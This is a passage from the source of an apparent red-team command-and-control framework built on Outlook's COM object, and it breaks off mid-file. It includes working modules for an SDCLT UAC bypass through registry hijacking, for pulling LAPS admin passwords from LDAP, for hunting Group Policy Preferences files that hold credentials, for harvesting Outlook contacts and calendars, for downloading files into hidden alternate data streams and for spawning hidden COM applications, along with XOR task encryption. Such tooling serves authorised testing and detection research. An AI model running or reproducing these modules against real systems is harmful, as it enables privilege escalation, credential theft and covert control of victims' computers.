27 | If Len(parts(2)) > ml3 Then 28 | ml3 = Len(parts(2)) 29 | End If 30 | next 31 | 32 | For Each line In lines 33 | parts = Split(line, " - ") 34 | spacesToAdd1 = ml1 - Len(parts(0)) 35 | spacesToAdd2 = ml2 - Len(parts(1)) 36 | spacesToAdd3 = ml3 - Len(parts(2)) 37 | line = parts(0) & String(spacesToAdd1, " ") & " " & parts(1) & String(spacesToAdd2, " ") & " " & parts(2) & String(spacesToAdd3, " ") 38 | list_recyclebin = list_recyclebin & line & vbCrLF 39 | Next 40 | End Function -------------------------------------------------------------------------------- /functions/trolling/play_voice.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import makeint, quotedstring 3 | from lib.tab_completers.generic import tab_choice 4 | from lib.validators.generic import ischoice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | This is a troll module, allows you to specify text as input and it will read it out loud on the speaker using sapi.spvoice 12 | 13 | It uses sapi.spvoice 14 | - Voice 15 | - speak 16 | """ 17 | self.entry = 'play_voice' 18 | self.depends = [] 19 | 20 | self.options['speaktext'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "Text you want to say on the computer", 24 | "handler": quotedstring 25 | } 26 | self.options['voicegender'] = { 27 | "value": 0, 28 | "required": True, 29 | "description": "0 == male, and 1 == female", 30 | "handler": makeint, 31 | "validator": ischoice, 32 | "validatorargs": {'choices': ["0", "1"]}, 33 | "tab_complete": tab_choice, 34 | "tab_args": {'choices': ["0", "1"]} 35 | } 36 | super().__init__(templatepath) 37 | -------------------------------------------------------------------------------- /helperFunctions/Setregvalue_hkcu.txt: -------------------------------------------------------------------------------- 1 | Function SetRegValue_HKCU(PathToKey, RegType, ValueName, Value) 2 | On Error Resume Next 3 | SetRegValue_HKCU = "TEST " & PathToKey & " " & RegType & " " & ValueName & " " & Value 4 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 5 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 6 | objreg.CreateKey 2147483649, PathToKey 7 | If RegType = "REG_SZ" Then 8 | if ValueName = "@" Then 9 | objreg.SetStringValue 2147483649, PathToKey, "", Value 10 | SetRegValue_HKCU = "Value " & PathToKey & " " & ValueName & " Reg_Sz set to " & Value 11 | else 12 | objreg.SetStringValue 2147483649, PathToKey, ValueName, Value 13 | SetRegValue_HKCU = "Value " & PathToKey & " " & ValueName & " Reg_Sz set to " & Value 14 | end if 15 | ElseIf RegType = "REG_DWORD" Then 16 | if ValueName = "@" Then 17 | objreg.SetDWORDValue 2147483649, PathToKey, "", Value 18 | SetRegValue_HKCU = "Value " & PathToKey & " " & ValueName & " Reg_Dword set to " & Value 19 | else 20 | objreg.SetDWORDValue 2147483649, PathToKey, ValueName, Value 21 | SetRegValue_HKCU = "Value " & PathToKey & " " & ValueName & " Reg_Dword set to " & Value 22 | End if 23 | Else 24 | SetRegValue_HKCU = RegType & " Not implemented yet" 25 | End If 26 | End Function -------------------------------------------------------------------------------- /functions/execute/host/uac-sdclt.txt: -------------------------------------------------------------------------------- 1 | Function Execute_UAC_sdclt() 2 | On Error Resume Next 3 | Execute_UAC_sdclt = "SDCLT UAC BYPASS" & vbCrLf 4 | Execute_UAC_sdclt = Execute_UAC_sdclt & SetRegValue_HKCU("Software\Classes\Folder\shell\open\command", "REG_SZ", "@", {{command}}) 5 | Execute_UAC_sdclt = Execute_UAC_sdclt & vbCrLf 6 | Execute_UAC_sdclt = Execute_UAC_sdclt & SetRegValue_HKCU("Software\Classes\Folder\shell\open\command", "REG_SZ", "DelegateExecute", " ") 7 | Execute_UAC_sdclt = Execute_UAC_sdclt & vbCrLf 8 | 9 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 10 | Set objService = objLocator.ConnectServer(".", "root\cimv2") 11 | Set objConfig = objService.Get("Win32_ProcessStartup").SpawnInstance_() 12 | Set objProcess = objService.Get("Win32_Process") 13 | objProcess.Create "explorer /root,c:\windows\system32\sdclt.exe", Null, objConfig, varProcessId 14 | Execute_UAC_sdclt = Execute_UAC_sdclt & "Executed sdclt.exe to trigger UAC bypass" & vbCrLf & "Process id sdclt.exe: " & varProcessId 15 | Execute_UAC_sdclt = Execute_UAC_sdclt & vbCrLf 16 | 17 | 'Sleep 18 | Execute_UAC_sdclt = Execute_UAC_sdclt & "Running cleanup in 45 seconds (delete command reg key)" 19 | window.clearTimeout(st) 20 | st = window.setTimeout("wait", 45000, "VBScript") 21 | End Function 22 | 23 | Sub wait() 24 | DelRegKey_HKCU("Software\Classes\Folder\shell\open\command") 25 | End Sub -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_lapspassword.txt: -------------------------------------------------------------------------------- 1 | Function list_lapspassword() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT DS_ms_Mcs_AdmPwd FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT DS_ms_Mcs_AdmPwd,DS_sAMAccountName,DS_ms_Mcs_AdmPwdExpirationTime FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL") 8 | 9 | For Each PATH in colItems 10 | For Each pathAttribute in PATH.Properties_ 11 | Select Case TypeName(pathAttribute.value) 12 | case "String" 13 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 14 | case "Long" 15 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 16 | case "Boolean" 17 | Returndata = Returndata & pathAttribute.name & "BOOL:" & pathAttribute.value & vbCrLf 18 | case "SWbemObjectEx" 19 | 'Cannot get this work... 20 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 21 | case "Variant()" 22 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 23 | End Select 24 | Next 25 | Returndata = Returndata & vbCrLf 26 | Next 27 | list_lapspassword = Returndata 28 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/read_contacts.txt: -------------------------------------------------------------------------------- 1 | Function read_contacts() 2 | on error resume next 3 | Set folder = (window.external.OutlookApplication.GetNameSpace("MAPI")).GetDefaultFolder(10) 4 | 5 | Set oItems = folder.items 6 | read_contacts = "Getting Contacts items from - " & folder.folderpath & vbCrLf & vbCrLf 7 | For i = 1 To oItems.count 8 | if (oItems(i).class = 40) then 9 | read_contacts = read_contacts & "-= Contact object =-" & vbCrLf 10 | read_contacts = read_contacts & "Email: " & oItems(i).Email1Address & vbCrLf 11 | read_contacts = read_contacts & "Email2: " & oItems(i).Email2Address & vbCrLf 12 | read_contacts = read_contacts & "FileAs: " & oItems(i).FileAs & vbCrLf 13 | read_contacts = read_contacts & "FirstName: " & oItems(i).FirstName & vbCrLf 14 | read_contacts = read_contacts & "LastName: " & oItems(i).LastName & vbCrLf 15 | read_contacts = read_contacts & "LastNameAndFirstName : " & oItems(i).LastNameAndFirstName & vbCrLf 16 | read_contacts = read_contacts & "MobileTelephoneNumber : " & oItems(i).MobileTelephoneNumber & vbCrLf 17 | read_contacts = read_contacts & "PrimaryTelephoneNumber : " & oItems(i).PrimaryTelephoneNumber & vbCrLf 18 | read_contacts = read_contacts & "Webpage : " & oItems(i).WebPage & vbCrLf 19 | read_contacts = read_contacts & "OfficeLocation : " & oItems(i).OfficeLocation & vbCrLf 20 | read_contacts = read_contacts & vbCrLf 21 | end if 22 | next 23 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/read_calendar.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring,makeint,makebool 3 | from lib.validators.generic import ischoice 4 | from lib.tab_completers.generic import tab_choice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | This module allows you to read calendar items. 12 | 13 | It uses OutlookApplication 14 | - GetNameSpace("MAPI").GetDefaultFolder(9) 15 | - GetNameSpace("MAPI").GetDefaultFolder(9).items 16 | """ 17 | self.entry = 'read_calendar' 18 | self.depends = [] 19 | self.options['days_to_read'] = { 20 | "value": 7, 21 | "required": True, 22 | "description": "The number of days ahead of time you want to view the calendar for", 23 | "handler": makeint 24 | } 25 | self.options['include_body'] = { 26 | "value": "True", 27 | "required": True, 28 | "description": "List out the body of the meeting", 29 | "handler": makebool, 30 | "validator": ischoice, 31 | "validatorargs": {'choices': ["False", "True"]}, 32 | "tab_complete": tab_choice, 33 | "tab_args": {'choices': ["False", "True"]} 34 | } 35 | super().__init__(templatepath) -------------------------------------------------------------------------------- /helperFunctions/base64.txt: -------------------------------------------------------------------------------- 1 | Function Base64Encode(ByVal sText, ByVal fAsUtf16LE) 2 | 3 | ' Use an aux. XML document with a Base64-encoded element. 4 | ' Assigning the byte stream (array) returned by StrToBytes() to .NodeTypedValue 5 | ' automatically performs Base64-encoding, whose result can then be accessed 6 | ' as the element's text. 7 | With CreateObject("Msxml2.DOMDocument").CreateElement("aux") 8 | .DataType = "bin.base64" 9 | if fAsUtf16LE then 10 | .NodeTypedValue = StrToBytes(sText, "utf-16le", 2) 11 | else 12 | .NodeTypedValue = StrToBytes(sText, "utf-8", 3) 13 | end if 14 | Base64Encode = .Text 15 | End With 16 | 17 | End Function 18 | 19 | function StrToBytes(ByVal sText, ByVal sTextEncoding, ByVal iBomByteCount) 20 | 21 | ' Create a text string with the specified encoding and then 22 | ' get its binary (byte array) representation. 23 | With CreateObject("ADODB.Stream") 24 | ' Create a stream with the specified text encoding... 25 | .Type = 2 ' adTypeText 26 | .Charset = sTextEncoding 27 | .Open 28 | .WriteText sText 29 | ' ... and convert it to a binary stream to get a byte-array 30 | ' representation. 31 | .Position = 0 32 | .Type = 1 ' adTypeBinary 33 | .Position = iBomByteCount ' skip the BOM 34 | StrToBytes = .Read 35 | .Close 36 | End With 37 | 38 | end function -------------------------------------------------------------------------------- /functions/operation/outlook/changeview_outlookfolder.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring,makeint,makebool 3 | from lib.validators.generic import ischoice 4 | from lib.tab_completers.generic import tab_choice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | This module allows you to change the view for the user in Outlook. 12 | You can use this to for instance navigate the user to the calendar/tasks/junk etc 13 | 14 | folder option should be set to int value found here: 15 | https://docs.microsoft.com/en-us/office/vba/api/outlook.oldefaultfolders 16 | That means, 17 | outbox would be 4 18 | inbox would be 6 19 | sent would be 5 20 | tasks would be 13 21 | calendar would be 9 22 | junk would be 23 23 | 24 | It uses OutlookApplication 25 | - GetNameSpace("MAPI").GetDefaultFolder(VARIABLE) 26 | - ActiveExplorer.CurrentFolder 27 | """ 28 | self.entry = 'changeview_outlookfolder' 29 | self.depends = [] 30 | self.options['folder'] = { 31 | "value": None, 32 | "required": True, 33 | "description": "Folder to hide or unhide", 34 | "handler": makeint 35 | } 36 | super().__init__(templatepath) 37 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributions 2 | If you are considering contributing to our repository, first thank you for doing so!
3 | 4 | Contributions from community members are more than welcome, there are a few items that you should be aware of for a smooth process
5 | 6 | At this time we will not be accepting new functional changes to the provided COM object. If you find an error in the 7 | existing code we will accept a pull to fix that within the COM object. 8 | 9 | ## Technique Expectations 10 | * Capabilities should run without causing outlook.exe to lock up. 11 | * Capabilities should acount for errors that may occur and handle them 12 | 13 | ## Code Expectations 14 | * python code should be coded to work from version 3.9 to 3.11 15 | * Any additions to helperFunctions should be well-formed and usable from other vbs scripts 16 | * Removal of intentionally placed IOC's will be rejected 17 | * Again any updates to code under api/* should be error correcting in nature only, not feature additions. 18 | 19 | ## What to expect as a contributor 20 | After your contribution is received, it will receive an in-depth code review and testing.
21 | After testing is completed, we will have zero or more rounds of change requests based on findings until there are no issues in the code. At that point it will be accepted into the repository, and your github username will be added to our credit list (if you would prefer not to be added or some other handle to be used, just let me know) 22 | -------------------------------------------------------------------------------- /functions/execute/host/remove_homepage.txt: -------------------------------------------------------------------------------- 1 | Function remove_homepage() 2 | On Error Resume Next 3 | Set objContext = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemNamedValueSet") 4 | objContext.Add"__ProviderArchitecture",RegType 5 | objContext.Add"__RequiredArchitecture",True 6 | 7 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 8 | Set objServices = objLocator.ConnectServer(".", "root\cimv2") 9 | Set objReg=objServices.Get("StdRegProv") 10 | 11 | objReg.GetStringValue 2147483648, "Word.Application\CurVer", "", o3 12 | over = Right(o3, 2) & ".0" 13 | 14 | strcrSecPth = "Software\Microsoft\Office\" + over + "\Outlook\UserInfo" 15 | strKSecPth = "Software\Microsoft\Office\" + over + "\Outlook\Security" 16 | strKWebPth = "Software\Microsoft\Office\" + over + "\Outlook\Webview\inbox" 17 | strKey1EntryName = "EnableRoamingFolderHomepages" 18 | strKey2EntryName = "URL" 19 | strKey3EntryName = "KEY" 20 | 21 | objReg.deletevalue 2147483649, strKSecPth,strKey1EntryName 22 | objReg.deletevalue 2147483649, strKWebPth,strKey2EntryName 23 | objReg.deletevalue 2147483649, strcrSecPth,strKey3EntryName 24 | 25 | Set calfolder = window.external.OutlookApplication.GetNameSpace("MAPI").GetDefaultFolder(9) 26 | Set window.external.OutlookApplication.ActiveExplorer.CurrentFolder = calfolder 27 | remove_homepage = "Registry values removed and Outlook changed view to calendar" 28 | End Function -------------------------------------------------------------------------------- /functions/execute/host/uac-sdclt.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | DETECTED BY WINDOWS DEFENDER AS 11 | Behavior:Win32/UACBypassExp.T!proc 12 | 13 | Execute a command using the SDCLT.exe UAC bypass. 14 | This module sets HKCU\\Software\\Classes\\Folder\\shell\open\\command default value to the specified command option. 15 | It also sets the DelegateExecute under the same path and executes: 16 | explorer.exe /root,c:\windows\system32\sdclt.exe 17 | Execution through win32_process create 18 | 19 | It uses WbemScripting.SWbemLocator 20 | - ConnectServer(root\cimv2) 21 | - ConnectServer(root\cimv2).Get("Win32_ProcessStartup").SpawnInstance_() 22 | - ConnectServer(root\cimv2).Get("Win32_Process") 23 | 24 | """ 25 | self.entry = 'Execute_UAC_sdclt' 26 | self.depends = ['./helperFunctions/Setregvalue_hkcu.txt','./helperFunctions/Delregkey_hkcu.txt'] 27 | self.options['command'] = { 28 | "value": None, 29 | "required": True, 30 | "description": "Command to execute on remote target", 31 | "handler": quotedstring 32 | } 33 | super().__init__(templatepath) 34 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_gpp.txt: -------------------------------------------------------------------------------- 1 | Function list_gpp() 2 | On error resume next 3 | Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell") 4 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 5 | dom = sh.ExpandEnvironmentStrings("%USERDNSDOMAIN%") 6 | polpath = "C:\Windows\sysnative\GroupPolicy\DataStore\0\sysvol\" & dom & "\Policies\" 7 | If fs.FolderExists(polpath) = True Then 8 | output = "Found " & "C:\Windows\sysnative\GroupPolicy\DataStore\0\sysvol\" & dom & "\Policies\" & vbCrLf 9 | output = output & "Searching for Groups.xml" & vbCrLf & dir_lister(polpath, 0, 4, "xml", "Groups", True, "mb") & vbCrLf 10 | output = output & "Searching for Drives.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Drives", True, "mb") & vbCrLf 11 | output = output & "Searching for Services.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Services", True, "mb") & vbCrLf 12 | output = output & "Searching for ScheduledTasks.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "ScheduledTasks", True, "mb") & vbCrLf 13 | output = output & "Searching for Datasources.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Datasources", True, "mb") & vbCrLf 14 | output = output & "Searching for Printers.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Printers", True, "mb") & vbCrLf 15 | else 16 | output = "Local Policy Folder not found at " & polpath 17 | End If 18 | list_gpp = output 19 | End Function -------------------------------------------------------------------------------- /functions/operation/file/download_filehttp.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module is used to download from the specified url in the surl option and save it on the Specula agent. 10 | You specify where you want the file to be stored in the destpath option. 11 | It also supports AlternateDataStreams, meaning you can specify destpath as c:\\temp\\file.txt:nothere 12 | 13 | It uses MSXML2.ServerXMLHTTP 14 | - open 15 | - send 16 | - status 17 | - ResponseBody 18 | 19 | It used ADODB.STREAM 20 | - Type 21 | - open 22 | - write 23 | - savetofile 24 | - close 25 | """ 26 | self.entry = 'download_filehttp' 27 | self.depends = [] 28 | self.options['url'] = { 29 | "value": None, 30 | "required": True, 31 | "description": "URL the agent will attempt to download this file from", 32 | "handler": quotedstring 33 | } 34 | self.options['destination'] = { 35 | "value": None, 36 | "required": True, 37 | "description": "path on disk the agent will attempt to write the downloaded file to", 38 | "handler": quotedstring 39 | } 40 | super().__init__(templatepath) 41 | -------------------------------------------------------------------------------- /Taskbooks/enum_installed_software.py: -------------------------------------------------------------------------------- 1 | def TaskBook(helpers, agent): 2 | mod = helpers.get_module('operation/file/list_dir') 3 | helpers.setModOption(mod, 'directory', optval="c:\Program Files") 4 | helpers.setModOption(mod, 'recurselevels', optval="0") 5 | helpers.setModOption(mod, 'depth', optval="0") 6 | helpers.setModOption(mod, 'filetype', optval="*") 7 | helpers.setModOption(mod, 'filename', optval="*") 8 | helpers.setModOption(mod, 'nodirectories', optval="False") 9 | helpers.setModOption(mod, 'sizeformat', optval="mb") 10 | helpers.setModOption(mod, 'nofiles', optval="True") 11 | helpers.setModOption(mod, 'output_console', optval="False") 12 | helpers.insertTask(agent, mod, 'operation/file/list_dir') 13 | 14 | mod = helpers.get_module('operation/file/list_dir') 15 | helpers.setModOption(mod, 'directory', optval="c:\Program Files (x86)") 16 | helpers.setModOption(mod, 'recurselevels', optval="0") 17 | helpers.setModOption(mod, 'depth', optval="0") 18 | helpers.setModOption(mod, 'filetype', optval="*") 19 | helpers.setModOption(mod, 'filename', optval="*") 20 | helpers.setModOption(mod, 'nodirectories', optval="False") 21 | helpers.setModOption(mod, 'sizeformat', optval="mb") 22 | helpers.setModOption(mod, 'nofiles', optval="True") 23 | helpers.setModOption(mod, 'output_console', optval="False") 24 | helpers.insertTask(agent, mod, 'operation/file/list_dir') 25 | 26 | mod = helpers.get_module('enumerate/host/list_installedapps') 27 | helpers.insertTask(agent, mod, 'enumerate/host/list_installedapps') -------------------------------------------------------------------------------- /functions/enumerate/host/list_applocker.txt: -------------------------------------------------------------------------------- 1 | Function list_applocker() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | 6 | ALlog = "Enumerate AppLocker status:" & vbCrLf 7 | KeyPathAL = "Software\Policies\Microsoft\Windows\SrpV2\" 8 | results = objReg.EnumKey(2147483650, KeyPathAL, arrSubkeysAL) 9 | If results <> 0 Then 10 | ALlog = ALlog & "AppLocker disabled!" 11 | list_applocker = ALlog 12 | Else 13 | ALlog = ALlog & "AppLocker enabled!" & vbCrlf 14 | For Each strSubkeyAL In arrSubkeysAL 15 | status = objReg.GetDwordValue(2147483650, KeyPathAL & strSubkeyAL, "EnforcementMode", sectionMode) 16 | If status <> 0 Then 17 | val = "Not Enabled" 18 | Else 19 | If sectionMode = 1 Then 20 | val = "Enforced" 21 | ElseIf sectionMode = 0 Then 22 | val = "Auditing" 23 | End If 24 | resul = objReg.EnumKey(2147483650, KeyPathAL & strSubKeyAL, arrSectionSub) 25 | AppLockerRules = AppLockerRules & "AppLocker Rule section: " & strSubKeyAL & vbCrlf 26 | For Each strSub in arrSectionSub 27 | res = objReg.GetStringValue(2147483650, KeyPathAL & strSubKeyAL & "\" & strSub, "Value", outrules) 28 | AppLockerRules = AppLockerRules & outrules & vbCrlf 29 | Next 30 | End If 31 | ALlog = ALlog & "EnforcementMode for " & strSubKeyAl & " Is " & val & vbCrlf 32 | Next 33 | list_applocker = ALlog & vbCrlf & AppLockerRules 34 | End If 35 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_user.txt: -------------------------------------------------------------------------------- 1 | Function list_user() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT * FROM ds_user Where DS_sAMAccountName = '" & {{samaccountname}} & "'" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_user Where DS_sAMAccountName = '" & {{samaccountname}} & "'") 8 | 9 | if Not colItems.count <= 0 then 10 | Returndata = Returndata & "samaccountname lookup successful:" & vbCrLf 11 | 12 | For Each PATH in colItems 13 | For Each pathAttribute in PATH.Properties_ 14 | Select Case TypeName(pathAttribute.value) 15 | case "String" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "Long" 18 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 19 | case "Boolean" 20 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 21 | case "SWbemObjectEx" 22 | 'Cannot get this work... 23 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 24 | case "Variant()" 25 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 26 | End Select 27 | Next 28 | Next 29 | else 30 | Returndata = Returndata & {{samaccountname}} & " not found" & vbCrLf 31 | end if 32 | list_user = Returndata 33 | End Function -------------------------------------------------------------------------------- /functions/execute/host/application.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Executes the specified COM application hidden. 11 | Application is specified setting the com_application option. It defaults to word.application. 12 | Note that some of the applications starts and immmediatly terminates. 13 | 14 | Typical application are: 15 | - word.application 16 | - excel.application 17 | - powerpoint.application 18 | - access.application 19 | - oneNote.application 20 | - publisher.application 21 | 22 | Full list of objects can be found using this Powershell oneliner: 23 | gci HKLM:\\Software\\Classes -ea 0| ? {$_.PSChildName -match '^\\w+\\.\\w+$' -and (gp "$($_.PSPath)\\CLSID" -ea 0)} | ft PSChildName 24 | 25 | The executed application gets the parent pid of SVCHost.exe (C:\Windows\system32\svchost.exe -k DcomLaunch -p) 26 | 27 | It uses CreateObject(Specified com application) 28 | """ 29 | self.entry = 'Execute_Application' 30 | self.depends = [] 31 | self.options['com_application'] = { 32 | "value": "word.application", 33 | "required": True, 34 | "description": "COM application to start", 35 | "handler": quotedstring 36 | } 37 | super().__init__(templatepath) 38 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_passwordpolicy.txt: -------------------------------------------------------------------------------- 1 | Function list_passwordpolicy() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns") 8 | For Each PATH in colItems 9 | For Each pathAttribute in PATH.Properties_ 10 | Select Case TypeName(pathAttribute.value) 11 | case "String" 12 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 13 | case "Long" 14 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 15 | case "Boolean" 16 | Returndata = Returndata & pathAttribute.name & "BOOL:" & pathAttribute.value & vbCrLf 17 | case "SWbemObjectEx" 18 | 'Cannot get this work... 19 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 20 | case "Variant()" 21 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 22 | End Select 23 | Next 24 | Returndata = Returndata & vbCrLf 25 | Next 26 | list_passwordpolicy = Returndata 27 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_computer.txt: -------------------------------------------------------------------------------- 1 | Function list_computer() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP") 5 | 6 | Returndata = Returndata & "Running query: " & "SELECT * FROM ds_computer Where DS_sAMAccountName = '" & {{samaccountname}} & "'" & vbCrLf 7 | Set colItems = objWMIService.ExecQuery("SELECT * FROM ds_computer Where DS_sAMAccountName = '" & {{samaccountname}} & "'") 8 | 9 | if Not colItems.count <= 0 then 10 | Returndata = Returndata & "samaccountname lookup successful:" & vbCrLf 11 | 12 | For Each PATH in colItems 13 | For Each pathAttribute in PATH.Properties_ 14 | Select Case TypeName(pathAttribute.value) 15 | case "String" 16 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 17 | case "Long" 18 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 19 | case "Boolean" 20 | Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf 21 | case "SWbemObjectEx" 22 | 'Cannot get this work... 23 | 'Returndata = Returndata & pathAttribute.name & vbCrLf 24 | case "Variant()" 25 | Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf 26 | End Select 27 | Next 28 | Next 29 | else 30 | Returndata = Returndata & {{samaccountname}} & " not found" & vbCrLf 31 | end if 32 | list_computer = Returndata 33 | End Function -------------------------------------------------------------------------------- /lib/core/utility.py: -------------------------------------------------------------------------------- 1 | import re 2 | from lib.core.setup import gconfig 3 | from datetime import datetime 4 | 5 | def encrypt_code(code, key): 6 | Position = -1 7 | z = "" 8 | for i in range(len(code)): 9 | Position = Position + 1 10 | if Position >= len(key): 11 | Position = 0 12 | 13 | keynumber = ord(key[Position:Position + 1]) 14 | org = ord(code[i:i + 1]) 15 | cpt = org ^ keynumber 16 | cptstr = hex(cpt)[2:] 17 | if len(cptstr) < 2: 18 | cptstr = "0" + cptstr 19 | z = z + cptstr 20 | return z 21 | 22 | 23 | def decrypt_code(code, key): 24 | Position = -1 25 | z = "" 26 | chars = re.findall('..', code) # get each byte/char 27 | 28 | for i in range(len(chars)): 29 | Position = Position + 1 30 | if Position >= len(key): 31 | Position = 0 32 | 33 | keynumber = ord(key[Position:Position + 1]) 34 | decstr = int(chars[i], 16) ^ keynumber # ^ is XOR int,16 converts hex to decimal value 35 | z = z + chr(decstr) 36 | return z 37 | 38 | 39 | class TaskClass: 40 | def __init__(self, funcname, code, entry, options, encrypt=True, status=None, printlog=True): 41 | self.name = funcname 42 | self.code = code 43 | if gconfig.DEBUG: 44 | print(code) 45 | if status is not None: 46 | self.status = status 47 | self.printlog = printlog 48 | self.entry = entry 49 | self.encrypt = encrypt 50 | self.options = options 51 | self.added = datetime.now().strftime(gconfig.TIME_FORMAT) 52 | 53 | -------------------------------------------------------------------------------- /functions/operation/file/cat_file.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring,makebool 3 | from lib.validators.generic import ischoice 4 | from lib.tab_completers.generic import tab_choice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | This module gets the content of the file specified in file 12 | and outputs it to the log file. 13 | 14 | It uses Scripting.FileSystemObject 15 | - OpenTextFile 16 | - FileExists 17 | """ 18 | self.entry = 'cat_file' 19 | self.depends = [] 20 | self.options['file'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "Path to file you want to cat", 24 | "handler": quotedstring 25 | } 26 | self.options['output_console'] = { 27 | "value": "False", 28 | "required": True, 29 | "description": "If True, it will show the output in the console", 30 | "hidden": True, 31 | "handler": makebool, 32 | "validator": ischoice, 33 | "validatorargs": {'choices': ["False", "True"]}, 34 | "tab_complete": tab_choice, 35 | "tab_args": {'choices': ["False", "True"]} 36 | } 37 | super().__init__(templatepath) 38 | 39 | def rethandler(self, agent, options, data): 40 | if options['output_console']['value'] == "True": 41 | print("\n") 42 | print(data) -------------------------------------------------------------------------------- /functions/operation/file/zip_content.py: -------------------------------------------------------------------------------- 1 